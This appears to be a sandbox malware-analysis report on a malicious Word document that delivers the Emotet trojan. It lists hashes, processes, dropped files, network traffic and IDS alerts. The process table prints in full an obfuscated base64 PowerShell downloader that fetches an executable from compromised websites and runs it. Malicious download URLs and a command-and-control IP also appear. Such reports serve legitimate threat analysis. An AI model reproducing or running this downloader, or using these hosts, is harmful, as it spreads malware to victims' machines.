File name: | 3957934-459485.doc |
Full analysis: | https://app.any.run/tasks/2ea66c62-6538-4649-b4b9-b32232b33c8e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 30, 2020, 00:07:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Dolorem., Author: Clment Richard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 18:52:00 2020, Last Saved Time/Date: Tue Sep 29 18:52:00 2020, Number of Pages: 1, Number of Words: 3810, Number of Characters: 21718, Security: 8 |
MD5: | A58DF7861AAEF0038D6028F76318C5C8 |
SHA1: | C3DAC6D3BA1F95D49BEE4E37858F1FF8433CF5FC |
SHA256: | 8666706E9EE66B8E782269A6C387B2CE242C017E7507BC5D65FCBEDBC021F2C4 |
SSDEEP: | 768:FQ6UUXZsPTX14VTL02vTf9fH1n6PT1Ms+0/qnYKTi9TwsRT/tr3wpdQ:4CVTLNTf9f5cTB+iqhsx/FAY |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
LocaleIndicator: | 1033 |
CodePage: | Unicode UTF-16, little endian |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 25478 |
Paragraphs: | 50 |
Lines: | 180 |
Company: | - |
Security: | Locked for annotations |
Characters: | 21718 |
Words: | 3810 |
Pages: | 1 |
ModifyDate: | 2020:09:29 17:52:00 |
CreateDate: | 2020:09:29 17:52:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Clément Richard |
Subject: | - |
Title: | Dolorem. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2100 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3957934-459485.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3128 | POwersheLL -ENCOD JABQADcAdAAwADAAbQBzAD0AKAAoACcARgBkACcAKwAnADQAJwApACsAKAAnADQAJwArACcAbgA1AHMAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABFAG4AVgA6AHUAcwBFAFIAcABSAG8ARgBpAGwARQBcAHAARABtADQANgB3AHcAXABSADIAWQBIAEEANQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAEUAYwB0AG8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBDAFUAUgBJAHQAYAB5AHAAYABSAE8AVABPAGMATwBMACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAMQAnACsAJwAyACwAIAAnACkAKwAnAHQAJwArACcAbAAnACsAKAAnAHMAMQAnACsAJwAxACwAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQAWQB0AGkAMABhAGcAZQAgAD0AIAAoACcAUwAnACsAJwBsACcAKwAoACcAawAwAGwAJwArACcAdgAnACkAKQA7ACQAWAAwADQAdgBlAHIAXwA9ACgAKAAnAEMAJwArACcAdgBsACcAKQArACcAbgAnACsAKAAnAGUAeAAnACsAJwBnACcAKQApADsAJABOAHYAMABqADcAZgBoAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAEkAJwArACgAJwBRAG0AUABkAG0AJwArACcANAA2AHcAJwArACcAdwBJACcAKQArACcAUQAnACsAKAAnAG0AJwArACcAUgAyAHkAaAAnACsAJwBhADUAOQBJAFEAJwArACcAbQAnACkAKQAgACAALQBSAGUAcABMAEEAYwBFACgAJwBJACcAKwAnAFEAbQAnACkALABbAGMAaABhAHIAXQA5ADIAKQArACQAWQB0AGkAMABhAGcAZQArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEcAdwBnAHYAMgA1ADUAPQAoACgAJwBWACcAKwAnAGoAdAB0AHoAJwApACsAJwB0AF8AJwApADsAJABPAF8AYwBiAHQAOAB3AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcAZQBCAGMAbABJAEUAbgBUADsAJABIAHAAMQAxAGwAdwA0AD0AKAAoACcAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwBsACcAKQArACgAJwBiAGwAYwBvAG0AcAB1AHQAYQAnACsAJwBjAGkAJwArACcAbwAnACsAJwBuAC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAHMAZQAnACkAKwAnAHIAdgAnACsAJwBpACcAKwAoACcAYwAnACsAJwBlAHMAJwApACsAKAAnAC8AJwArACcAZQBZACcAKwAnADMALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwADoAJwApACsAKAAnAC8ALwBzACcAKwAnAGgAbwAnACsAJwBwAC4AaAAnACkAKwAoACcAbwBtAGUAbgAnACsAJwBoAGUAJwApACsAJwBhACcAKwAnAGwAdAAnACsAKAAnAGgAeQAuAGMAbwAnACsAJwBtAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAJwBpACcAKwAnAG4AJwArACgAJwBjAGwAdQBkAGUAJwArACcAcwAnACkAKwAoACcALwAnACsAJwBMAHQAagAnACkAKwAnAC8AKgAnACsAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKQArACgAJwAvAHIAJwArACcAYQBpACcAKQArACgAJwBuAHQAbwBkAGEAJwArACcAeQAnACsAJwAuACcAKQArACgAJwBvAHIAJwArACcAZwAvAHcAcAAnACsAJwAtAGEAZABtACcAKQArACgAJwBpAG4AJwArACcALwBCACcAKwAnAC8AKgBoACcAKwAnAHQAdABwAHMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwBxAHUAYQBsAGkAJwArACcAdAB5AGMAJwArACcAaABpACcAKwAnAGwAZABjACcAKQArACgAJwBhACcAKwAnAHIAJwArACcAZQBwACcAKwAnAHIAJwArACcAZQBzAGMAaABvAG8AbAAuACcAKQArACgAJwBjAG8AbQAvACcAKwAnAGUAbQBxACcAKwAnAGIAJwArACcAbABrAC8AbQAnACsAJwAvACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAcwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuACcAKwAoACcAdAAnACsAJwBlAGsAJwArACcAYQBkAGIAJwApACsAKAAnAGEAJwArACcAdABhAG0AJwApACsAKAAnAC4AYwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwBwAC0AYwAnACsAJwBvAG4AJwArACcAdAAnACsAJwBlAG4AdAAvAFEAcQAvACoAJwArACcAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAoACcAcwA6AC8AJwArACcALwBiAG8AawBlAC4AeAAnACsAJwBpACcAKwAnAGEAbwB4AGkAZQBrAGUAagAnACsAJwBpAC4AdABvACcAKQArACcAcAAvACcAKwAnADkAYQAnACsAKAAnADYANQAnACsAJwA0ACcAKQArACgAJwB6ACcAKwAnAG8AcgAvAEoAbgBTAC8AKgBoAHQAdAAnACsAJwBwADoAJwApACsAJwAvACcAKwAoACcALwB5AHMALgB4ACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAbwB4AGkAZQBrACcAKwAnAGUAJwApACsAJwBqACcAKwAnAGkALgAnACsAJwB0ACcAKwAoACcAbwBwAC8AdwAnACsAJwBwAC0AYQBkACcAKwAnAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAHUAUQBZACcAKwAnAC8AJwApACkALgAiAHMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQB0AHgAXwBnADIAbgA9ACgAJwBGACcAKwAnAHMAegAnACsAKAAnAGgAYwByACcAKwAnAG8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABJADUANgA3AGIAeABvACAAaQBuACAAJABIAHAAMQAxAGwAdwA0ACkAewB0AHIAeQB7ACQATwBfAGMAYgB0ADgAdwAuACIARABPAFcAYABOAGwAYABvAEEAZABmAEkATABFACIAKAAkAEkANQA2ADcAYgB4AG8ALAAgACQATgB2ADAAagA3AGYAaAApADsAJABOADEAYgBuAGYAXwB3AD0AKAAoACcARAAnACsAJwBfADMAJwApACsAJwA3ADkAJwArACcAcgA4ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABOAHYAMABqADcAZgBoACkALgAiAGwAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwAxADMAMgAwACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AJwArACcAawBlAC0ASQB0AGUAbQAnACkAKAAkAE4AdgAwAGoANwBmAGgAKQA7ACQAUwBtAHYAYQBnAG8AcwA9ACgAJwBNACcAKwAoACcAbgBpAGUAdwAnACsAJwAyACcAKQArACcAbgAnACkAOwBiAHIAZQBhAGsAOwAkAEEAXwBfAHMAeAByAGIAPQAoACcATwAnACsAKAAnADYAJwArACcAZwBfACcAKQArACgAJwByACcAKwAnADIAMgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAB3AG4AZgA0AHMAbgA9ACgAJwBPACcAKwAoACcAZAB5AHcAbgAnACsAJwAwAHQAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2540 | "C:\Users\admin\Pdm46ww\R2yha59\Slk0lv.exe" | C:\Users\admin\Pdm46ww\R2yha59\Slk0lv.exe | POwersheLL.exe | |
User: admin Company: Flex Inc. Integrity Level: MEDIUM Description: Replacement for the Masked Edit Control v 2.0. Exit code: 0 Version: 2.8.0.3 | ||||
2680 | "C:\Users\admin\AppData\Local\KBDSF\vds_ps.exe" | C:\Users\admin\AppData\Local\KBDSF\vds_ps.exe | Slk0lv.exe | |
User: admin Company: Flex Inc. Integrity Level: MEDIUM Description: Replacement for the Masked Edit Control v 2.0. Version: 2.8.0.3 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB06.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3128 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L6CWEQFJS8H603EHI6DL.temp | — | |
MD5:— | SHA256:— | |||
2540 | Slk0lv.exe | C:\Users\admin\AppData\Local\Temp\~DFA4540050EF5FBBB5.TMP | — | |
MD5:— | SHA256:— | |||
3128 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:36FE326E12493E805B62142553A1E43C | SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F | |||
2540 | Slk0lv.exe | C:\Users\admin\AppData\Local\KBDSF\vds_ps.exe | executable | |
MD5:423BF19C5B0FAE0B905DAF4745406368 | SHA256:3294F016D12A190D3FF7820D6391D11927A4A703A7BACA5F3263D464DD56C6D8 | |||
2100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:7162320C2E15C09A7818F20026341B6B | SHA256:2318CD2C623B00802C141A2EE3E6D0162F1475560028C2C1D309E16845154757 | |||
2100 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D585E11660F4CC093A7C8B1C60518116 | SHA256:9782EDD854D5A58692406301CCDDEC7420CAC3DE5C5145C17B55C495513B1BBC | |||
3128 | POwersheLL.exe | C:\Users\admin\Pdm46ww\R2yha59\Slk0lv.exe | executable | |
MD5:423BF19C5B0FAE0B905DAF4745406368 | SHA256:3294F016D12A190D3FF7820D6391D11927A4A703A7BACA5F3263D464DD56C6D8 | |||
3128 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ab5e4.TMP | binary | |
MD5:36FE326E12493E805B62142553A1E43C | SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F | |||
2100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$57934-459485.doc | pgc | |
MD5:A766D5DDDD2C2FF06F6223504828F76E | SHA256:52A3FC080D8E7F58FBD1509E814223566B2FFECD83B9B581F2A081A103B663C0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3128 | POwersheLL.exe | GET | — | 66.97.41.90:80 | http://lblcomputacion.com/services/eY3/ | US | — | — | suspicious |
3128 | POwersheLL.exe | GET | 200 | 34.67.97.45:80 | http://shop.homenhealthy.com/wp-includes/Ltj/ | US | executable | 400 Kb | suspicious |
2680 | vds_ps.exe | POST | 200 | 202.22.141.45:80 | http://202.22.141.45/0KPULWHMf9iWfhpYCF/ByzxwsqWHJ1fK/yyKMVg/LLBxvwOhJ3yF5kiYh/r8CLsJ/ | NC | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3128 | POwersheLL.exe | 34.67.97.45:80 | shop.homenhealthy.com | — | US | suspicious |
— | — | 202.22.141.45:80 | — | OFFRATEL | NC | malicious |
3128 | POwersheLL.exe | 66.97.41.90:80 | lblcomputacion.com | Peer 1 Network (USA) Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
lblcomputacion.com |
| suspicious |
shop.homenhealthy.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3128 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3128 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3128 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2680 | vds_ps.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M10 |